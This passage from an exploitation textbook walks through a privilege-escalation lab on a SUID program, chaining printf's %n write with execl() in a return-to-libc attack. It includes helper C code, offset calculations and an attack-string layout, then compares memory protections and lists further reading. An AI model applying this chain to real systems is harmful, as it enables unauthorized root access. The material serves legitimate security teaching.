In some cases, we may end up without root privileges. This is because the default behavior of system and bash on some systems is to drop privileges on startup. The bash installed in Kali does not do this; however, Red Hat and others do.

For this lab, we will be using BackTrack 2 in order to have a standard distribution that drops privileges through system as well as has our debugging tools on it. To get around the privilege dropping, we need to use a wrapper program, which will contain the system function call. Then, we will call the wrapper program with the execl() function, which does not drop privileges. The wrapper will look like this:

image

Notice that we do not need the wrapper program to be SUID. Now we need to call the wrapper with the execl() function, like this:

execl(“./wrapper”, “./wrapper”, NULL)

We now have another issue to work through: the execl() function contains a NULL value as the last argument. We will deal with that in a moment. First, let’s test the execl() function call with a simple test program and ensure that it does not drop privileges when run as root:

image

Compile and make SUID like the vulnerable program vuln2.c:

image

Run it to test the functionality:

image

Great, we now have a way to keep the root privileges. Now all we need is a way to produce a NULL byte on the stack. There are several ways to do this; however, for illustrative purposes, we will use the printf() function as a wrapper around the execl() function. Recall that the %hn format token can be used to write into memory locations. To make this happen, we need to chain together more than one libc function call, as shown here:

image

Just like we did before, we will overwrite the old saved eip with the address of the glibc printf() function. At that point, when the original vulnerable function returns, this new saved eip will be popped off the stack and printf() will be executed with the arguments starting with “%3\$n”, which will write the number of bytes in the format string up to the format token (0x0000) into the third direct parameter. Because the third parameter contains the location of itself, the value of 0x0000 will be written into that spot. Next, the execl() function will be called with the arguments from the first “./wrapper” string onward. Voilà, we have created the desired execl() function on the fly with this self-modifying buffer attack string.
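The zero write can be observed safely outside an exploit. The following is a minimal sketch, assuming a Linux glibc system (some other C libraries disable %n); the function names are invented for illustration. The first helper shows that %n stores the number of bytes produced so far. The second uses a numbered third parameter, as the attack string does, and names the first two parameters with %.0s so the call stays well defined while still producing no output before the write. In C source the token is written without the shell's backslash.

```c
#include <assert.h>
#include <stdio.h>

/*
 * Returns the count that %n stores after prefix has been formatted.
 * Keep prefix shorter than the scratch buffer.
 */
int bytes_counted_by_n(const char *prefix)
{
    char scratch[128];
    int stored = -1; /* sentinel, overwritten by %n */

    assert(prefix != NULL);
    snprintf(scratch, sizeof scratch, "%s%n", prefix, &stored);
    return stored;
}

/*
 * Mirrors the "%3$n" idea: nothing is printed before the token, so the
 * value written through the third parameter is zero.
 */
int zero_via_third_param(void)
{
    char scratch[8];
    int target = 0x41414141; /* non-zero so the overwrite is visible */

    snprintf(scratch, sizeof scratch, "%1$.0s%2$.0s%3$n",
             "./wrapper", "./wrapper", &target);
    return target;
}
```

In the attack string, the third parameter points at the last word of the buffer itself, so the same zero write produces the NULL terminator that execl() needs.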

In order to build the preceding exploit, we need the following information:

• The address of the printf() function

• The address of the execl() function

• The address of the “%3\$n” string in memory (we will use the environment section)

• The address of the “./wrapper” string in memory (we will use the environment section)

• The address of the location we wish to overwrite with a NULL value

Starting at the top, let’s get the addresses:

image

We will use the environment section of memory to store our strings and retrieve their location with our handy get_env.c utility:

image

Remember that the name of the get_env program needs to be the same length as the name of the vulnerable program, which in this case is vuln2 (five characters):

$ gcc -o gtenv get_env.c
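The name length matters because the program name is stored on the stack above the environment, so a longer or shorter name shifts every environment string. When renaming the helper is not convenient, a commonly used heuristic (described in Erickson's Hacking: The Art of Exploitation, not in this lab) corrects the address by two bytes per character of difference. The sketch below assumes that heuristic holds on the target system; the function name adjust_env_addr is hypothetical, and the result should always be confirmed in gdb.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/*
 * Estimate where an environment string will sit in the target program,
 * given its address as seen from a helper program with a different name.
 * Assumption: each extra character in the program name lowers the
 * environment addresses by two bytes.
 */
uint32_t adjust_env_addr(uint32_t addr_in_helper, const char *helper_name,
                         const char *target_name)
{
    int64_t delta;

    assert(helper_name != NULL && target_name != NULL);
    delta = (int64_t)strlen(helper_name) - (int64_t)strlen(target_name);
    return (uint32_t)((int64_t)addr_in_helper + 2 * delta);
}
```

With names of equal length, such as ./gtenv and ./vuln2, the adjustment is zero, which is why the lab simply renames the helper.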

Okay, we are ready to place the strings into memory and retrieve their locations:

image

We have everything except the location of the last memory slot of our buffer. To determine this value, first we find the size of the vulnerable buffer. With this simple program, we have only one internal buffer, which will be located at the top of the stack when inside the vulnerable function main(). In the real world, a little more research will be required to find the location of the vulnerable buffer by looking at the disassembly and some trial and error.

image

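Now that we know the size of the vulnerable buffer plus compiler-added padding (0x18 = 24 bytes), we can calculate the offset of the sixth memory address in our attack string. Six 4-byte words sit between the end of the padded buffer and that slot (the saved ebp plus the five addresses that precede it), so the offset is 24 + 6*4 = 48 = 0x30. Because we will place 4 bytes in that last location, the total size of the attack buffer will be 52 bytes.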

Next, we will send a representative-size (52 bytes) buffer into our vulnerable program and find the location of the beginning of the vulnerable buffer with gdb by printing the value of $esp:

image

Now that we have the location of the beginning of the buffer, add the calculated offset from earlier to get the correct target location (sixth memory slot after our overflowed buffer):

0xbffff480 + 0x30 = 0xbffff4b0
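The arithmetic above is easy to get wrong by one word, so it can help to encode it once. This is a small sketch using the values from this lab (a 24-byte padded buffer, six words before the target slot, and a buffer starting at 0xbffff480); the function names are invented for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define WORD_SIZE 4u /* bytes per stack slot on 32-bit x86 */

/* Offset of the target slot from the start of the vulnerable buffer. */
uint32_t slot_offset(uint32_t padded_buf_len, uint32_t words_before_slot)
{
    /* Guard against wrap-around in the multiplication and addition. */
    assert(words_before_slot <= (UINT32_MAX - padded_buf_len) / WORD_SIZE);
    return padded_buf_len + words_before_slot * WORD_SIZE;
}

/* Absolute address of the target slot, given where the buffer starts. */
uint32_t slot_address(uint32_t buf_start, uint32_t padded_buf_len,
                      uint32_t words_before_slot)
{
    return buf_start + slot_offset(padded_buf_len, words_before_slot);
}

/* Total attack length: everything before the slot plus the slot itself. */
uint32_t attack_length(uint32_t padded_buf_len, uint32_t words_before_slot)
{
    return slot_offset(padded_buf_len, words_before_slot) + WORD_SIZE;
}
```

For this lab, slot_offset(24, 6) gives 0x30, slot_address(0xbffff480, 24, 6) gives 0xbffff4b0, and attack_length(24, 6) gives 52.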

Finally, we have all the data we need, so let’s attack!

image

image

Woot! It worked. Some of you may have realized that a shortcut exists here. If you look at the last illustration, you will notice the last value of the attack string is a NULL. Occasionally, you will run into this situation. In that rare case, you don’t care if you pass a NULL byte into the vulnerable program, because the string will be terminated by a NULL anyway. Therefore, in this canned scenario, you could have removed the printf() function and simply fed the execl() attack string, as follows:

./vuln2 [filler of 28 bytes][&execl][&exit][./wrapper][./wrapper][\x00]

Try it:

image

Both ways work in this case. You will not always be as lucky, so you need to know both ways. See the “For Further Reading” section for even more creative ways to return to libc.

When privileges are being dropped, we can leverage other function calls to work around the calls that are dropping privileges. In this case, we leveraged the memory overwrite capability of printf() to null-terminate the arguments to execl(). By chaining these function calls using ret2libc, we don’t have to worry about putting executable code on the stack, and we can pass complex arguments to the functions whose addresses we’ve placed on the stack.

Bottom Line

Now that we have discussed some of the more common techniques used for memory protection, how do they stack up? Of the ones we reviewed, ASLR (PaX and PIE) and non-executable memory (PaX and ExecShield) provide protection to both the stack and the heap. StackGuard, StackShield, SSP, and Libsafe provide protection against stack-based attacks only. The following table shows the differences in the approaches.

image

Summary

In this chapter, we investigated format string weaknesses and how to leverage those weaknesses to expose data and impact application flow. By requesting additional data through the format string, we can expose memory locations, leaking information about the contents of variables and the stack.

Additionally, we can use the format string to change memory locations. Using some basic math, we can change values in memory to change application flow, or we can impact program execution by adding arguments to the stack and changing EIP values. These techniques can lead to arbitrary code execution, allowing for local privilege escalation or remote execution for network services.

We also looked at memory protection techniques like stack protection and layout randomization and then investigated some basic ways to bypass them. We leveraged a ret2libc attack to control program execution. By leveraging the libc functions, we were able to redirect application flow into known function locations with arguments we had pushed onto the stack. This allowed the functions to run without executing code on the stack and avoid having to guess at memory locations.

Combining these techniques, we now have a better toolkit for dealing with real-world systems and the ability to leverage these complex attacks for more sophisticated exploits. Protection techniques change, and strategies to defeat them evolve, so to better understand these techniques, the “For Further Reading” section has additional material for review.

References

1. Blaess, Christophe, Christophe Grenier, and Frédéric Raynal (2001, February 16). “Secure Programming, Part 4: Format Strings.” Retrieved from: www.cgsecurity.org/Articles/SecProg/Art4/.

For Further Reading

“Advanced return-into-lib(c) Exploits (PaX Case Study)” (nergal) www.phrack.com/issues.html?issue=58&id=4#article.

Exploiting Software: How to Break Code (Greg Hoglund and Gary McGraw) Addison-Wesley, 2004.

“Getting Around Non-Executable Stack (and Fix)” (Solar Designer) www.imchris.org/projects/overflows/returntolibc1.html.

Hacking: The Art of Exploitation (Jon Erickson) No Starch Press, 2003.

“Overwriting the .dtors Section” (Juan M. Bello Rivas) www.cash.sopot.kill.pl/bufer/dtors.txt.

Shaun2k2’s libc exploits www.exploit-db.com/exploits/13197/.

The Shellcoder’s Handbook: Discovering and Exploiting Security Holes (Jack Koziol et al.) Wiley, 2004.

“When Code Goes Wrong – Format String Exploitation” (DangerDuo) www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=7949&mode=thread&order=0&thold=0.